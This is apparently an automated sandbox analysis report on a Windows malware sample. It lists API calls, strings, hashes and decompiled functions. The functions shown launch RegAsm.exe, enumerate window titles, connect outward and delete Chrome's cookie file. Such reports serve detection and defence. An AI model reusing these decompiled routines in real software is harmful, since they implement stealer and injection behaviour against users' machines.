                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D69F
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D6BA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D6C3
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D6D9
                                    • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,0041BCB0,?,004057B5), ref: 00412E5A
                                    • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,004057B5), ref: 00412E64
                                    • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040D6F3
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001), ref: 0040D704
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D711
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D734
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D74B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  Strings
                                  • open, xrefs: 0040D70B
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 0040D752
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@2@@std@@G@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V01@@V?$basic_string@$??2@??3@?length@?$basic_string@?size@?$basic_string@ExecuteShell
                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                  • API String ID: 2112629403-3056885514
                                  • Opcode ID: 50475a9cfbc78c3b4d15a830515efdd2aa11e385f63a67c81f68d873a2421c2f
                                  • Instruction ID: 3c6387fd113382c931602557de23b741b53e110e960cdbc023917b4df3b65b40
                                  • Opcode Fuzzy Hash: 50475a9cfbc78c3b4d15a830515efdd2aa11e385f63a67c81f68d873a2421c2f
                                  • Instruction Fuzzy Hash: 94317C72910519EBCB04BBE1EC999FE7778AF54356B40487EF412A30E1EE785A04CB28
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D9A0, Relevance: 27.1, APIs: 18, Instructions: 96COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetKeyboardLayoutNameA.USER32 ref: 0040D9AF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D9BA
                                    • Part of subcall function 00412E83: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412E9D
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012,?,00000000,00000000,?,?,00000000,00000000), ref: 0040D9FC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 0040DA11
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 0040DA21
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA31
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA3E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA4B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA55
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000012), ref: 0040DA6C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA75
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA81
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA8D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA99
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DAA5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E69B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@CreateD@1@@FileG@2@@std@@G@std@@KeyboardLayoutNameV01@@V10@V10@@_itoa
                                  • String ID:
                                  • API String ID: 3751107300-0
                                  • Opcode ID: e90156051df4a0119cd1c56f39c542976f8b7538b01acf0d54b52f8ff002e118
                                  • Instruction ID: 7445f7784f172681db4ab6ed8b3104eac86986a278aabc0f04733adb6ce879a5
                                  • Opcode Fuzzy Hash: e90156051df4a0119cd1c56f39c542976f8b7538b01acf0d54b52f8ff002e118
                                  • Instruction Fuzzy Hash: 39310EB280051DABCB05ABE1EC49EEEBB7CBB54305F04447AF506E3061EF745689CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040EA96, Relevance: 27.1, APIs: 18, Instructions: 95windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetWindowTextW.USER32 ref: 0040EAAF
                                  • IsWindowVisible.USER32(?), ref: 0040EAB8
                                  • sprintf.MSVCRT ref: 0040EACF
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040EAE6
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004169C4,?,004169C4,00000000,004169C8), ref: 0040EB20
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004169C4,00000000,004169C8), ref: 0040EB2D
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,00000000,004169C8), ref: 0040EB3A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB47
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB57
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB65
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB71
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB7A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB83
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB8C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB95
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB9E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EBA7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EBB0
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$G@2@@std@@G@std@@V10@$??0?$basic_string@$D@1@@Window$?c_str@?$basic_string@?length@?$basic_string@G@1@@TextV01@V01@@V10@0@VisibleY?$basic_string@_itoasprintf
                                  • String ID:
                                  • API String ID: 1480451481-0
                                  • Opcode ID: 458cfa993eb2d62a5ecd06a29fbf8f583b6a8c65412ae194e4c4d661bc6b2e1f
                                  • Instruction ID: 896110e7d44d4e8721ff4af176c5386cc18dfd6a0cdb0307768c484521d74486
                                  • Opcode Fuzzy Hash: 458cfa993eb2d62a5ecd06a29fbf8f583b6a8c65412ae194e4c4d661bc6b2e1f
                                  • Instruction Fuzzy Hash: 0031BEB2C0060DEBDB05ABE0EC49DDE7B7CAB54305F108026F526E6061EB759699CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004071CF, Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 65fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 32%
                                  			E004071CF() {
				char _v5;
				char _v6;
				char _v24;
				void* _v40;
				char* _t12;
				CHAR* _t13;
				long _t20;
				char* _t21;
				void* _t25;

				_t12 = getenv("UserProfile");
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
				_t13 =  &_v24;
				L00414170();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				if(DeleteFileA(_t13) != 0) {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
					E00407A90("\n[Chrome Cookies found, cleared!]");
					_t25 = 1;
					L8:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return _t25;
				}
				_t20 = GetLastError();
				if(_t20 == 0) {
					_t21 =  &_v6;
					L5:
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
					E00407A90("\n[Chrome Cookies not found]");
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 1;
				}
				if(_t20 == 1) {
					_t21 =  &_v5;
					goto L5;
				}
				_t25 = 0;
				goto L8;
			}












                                  0x004071e4
                                  0x004071ef
                                  0x004071f6
                                  0x004071fa
                                  0x00407205
                                  0x0040720e
                                  0x0040721d
                                  0x00407271
                                  0x00407277
                                  0x0040727f
                                  0x00407281
                                  0x00407284
                                  0x00000000
                                  0x0040728a
                                  0x00407226
                                  0x00407227
                                  0x0040725c
                                  0x00407238
                                  0x0040723e
                                  0x00407244
                                  0x0040724f
                                  0x00000000
                                  0x00407255
                                  0x0040722a
                                  0x00407233
                                  0x00000000
                                  0x00407236
                                  0x0040722c
                                  0x00000000

                                  APIs
                                  • getenv.MSVCRT ref: 004071E4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004071EF
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004071FA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407205
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040720E
                                  • DeleteFileA.KERNEL32(00000000), ref: 00407215
                                  • GetLastError.KERNEL32 ref: 0040721F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies not found],00000000), ref: 0040723E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040724F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies found, cleared!],00000000), ref: 00407271
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407284
                                  Strings
                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 004071D9
                                  • [Chrome Cookies not found], xrefs: 00407239
                                  • [Chrome Cookies found, cleared!], xrefs: 0040726C
                                  • UserProfile, xrefs: 004071DF
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                  • API String ID: 3740952235-304995407
                                  • Opcode ID: 83c02d717cdcb3f1c877865c0182a46ec50423f0379789e6a2c4cf626d65b589
                                  • Instruction ID: 500589693ed1866fcec617c4cf6893fdd7c78fd48f7414b1be1692f61b7e1039
                                  • Opcode Fuzzy Hash: 83c02d717cdcb3f1c877865c0182a46ec50423f0379789e6a2c4cf626d65b589
                                  • Instruction Fuzzy Hash: AE119375D04609EBCB00FBA0DD4E9FE7738EA94741750007AF812E31D1EB796A45CAAB
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041203B, Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 61timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 32%
                                  			E0041203B(char _a4, char _a20) {
				struct _SYSTEMTIME _v20;
				char _v36;
				char _v52;
				char _v68;
				char _v84;
				int _t18;
				char* _t26;
				char* _t27;
				char* _t28;
				char* _t29;

				if( *0x41bcac != 0) {
					GetLocalTime( &_v20);
					_t3 =  &(_v20.wSecond); // 0x4051ef
					_t26 =  &_v84;
					L00414176();
					_t27 =  &_v68;
					L00414170();
					_t28 =  &_v52;
					L00414140();
					_t29 =  &_v36;
					L00414170();
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t29, _t28, _t28, _t27, _t27, _t26, _t26, "%02i:%02i:%02i:%03i ",  &_a4, " ",  &_a20, 0x415770, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff,  *_t3 & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff);
					_t18 = printf(_t29);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				}
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t18;
			}













                                  0x00412048
                                  0x00412052
                                  0x0041205d
                                  0x0041207e
                                  0x00412087
                                  0x00412090
                                  0x00412094
                                  0x0041209d
                                  0x004120a1
                                  0x004120aa
                                  0x004120ae
                                  0x004120b8
                                  0x004120bf
                                  0x004120cb
                                  0x004120d4
                                  0x004120dd
                                  0x004120e6
                                  0x004120e6
                                  0x004120ef
                                  0x004120f8
                                  0x004120ff

                                  APIs
                                  • GetLocalTime.KERNEL32(?), ref: 00412052
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                  • printf.MSVCRT ref: 004120BF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@$?c_str@?$basic_string@LocalTimeV10@0@V10@@printf
                                  • String ID: %02i:%02i:%02i:%03i $Q@
                                  • API String ID: 4249031962-3186260181
                                  • Opcode ID: 219c59aa8cfc69ea39da170a382ad6fcb882ddad4a02d2a278ec9a39d153be36
                                  • Instruction ID: f3ca9ea98f16ce9d12e0c862744fbe2e8a9e2291361fb12ebe279ffe92a69474
                                  • Opcode Fuzzy Hash: 219c59aa8cfc69ea39da170a382ad6fcb882ddad4a02d2a278ec9a39d153be36
                                  • Instruction Fuzzy Hash: 9311D3B680011DFBCF01EBE1EC49DEF7B7CBA54745B044026F912D2061EB789699CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405812, Relevance: 25.6, APIs: 17, Instructions: 138COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 00405853
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405868
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00405874
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00405898
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004058AE
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004058B7
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004058CC
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004058D6
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310), ref: 00405902
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?), ref: 00405922
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040590C
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310), ref: 00405943
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040594D
